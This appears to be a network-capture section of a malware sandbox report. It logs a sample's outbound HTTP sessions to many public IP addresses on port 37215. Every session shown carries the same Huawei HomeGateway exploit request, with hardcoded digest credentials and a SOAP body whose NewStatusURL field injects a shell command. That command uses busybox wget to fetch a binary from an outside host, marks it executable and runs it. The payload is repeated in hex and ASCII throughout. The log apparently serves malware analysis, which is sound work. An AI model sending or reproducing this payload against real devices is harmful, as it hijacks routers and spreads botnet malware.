                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1395192.168.2.153747245.77.100.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399779081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1396192.168.2.1536970197.97.166.11937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399806976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1397192.168.2.1549990186.246.109.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399836063 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1398192.168.2.1533440156.19.157.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399851084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1399192.168.2.154195837.143.44.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399883032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1400192.168.2.1546170138.192.179.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399884939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1401192.168.2.1534708138.173.162.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399904013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1402192.168.2.1551840138.115.125.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399944067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1403192.168.2.154541294.133.223.9437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399971008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1404192.168.2.1558578222.82.142.1237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399988890 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
